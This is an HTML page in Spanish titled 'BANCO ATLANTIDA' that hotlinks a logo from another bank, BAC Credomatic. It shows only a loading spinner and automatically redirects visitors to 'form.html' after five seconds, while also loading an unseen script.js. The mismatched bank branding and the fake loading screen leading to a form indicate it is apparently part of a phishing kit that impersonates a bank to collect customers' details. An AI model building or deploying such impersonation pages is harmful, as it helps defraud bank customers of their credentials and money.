

<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BANCO ATLANTIDA</title>
    <link rel="stylesheet" href="styles.css">
    <META HTTP-EQUIV="REFRESH" CONTENT="5;URL=form.html">

</head>
<body>
    <header style="z-index: 1;">
        <img src="https://www.baccredomatic.com/themes/custom/bac_theme/images/bac_logo.svg" alt="" style="width: 100px; margin-left: 20px;">
        <h1></h1>
    </header>
   <style>
    input{
        padding: 7px;
        width: 95%;
        border: 1px solid rgb(128, 128, 128);
        outline-color: black;
        box-sizing: border-box;
    }
    p{
        text-align: left;
    }
    .conte{
       
        width: 500px;
        box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
        padding: 10px;
        border-radius: 5px;
        background-color: white;
        z-index: 1;
        
    }
    button{
        padding: 10px;
        background-color: rgb(194, 26, 26);
        width: 95%;
        margin-top: 10px;
        border: none;
        color: white;
        border-radius: 5px;
    }
    @media only screen and (max-width: 850px){
        .conte{
            width: 85%;
          

        }
    }
   </style>
    <main>

          
           <img src="img/loading-green-loading.gif" alt="" style="width: 60px; display: block; margin: auto; margin-top: 300px; display: block;">
        
    </main>



    <script src="script.js"></script>
</body>
</html>


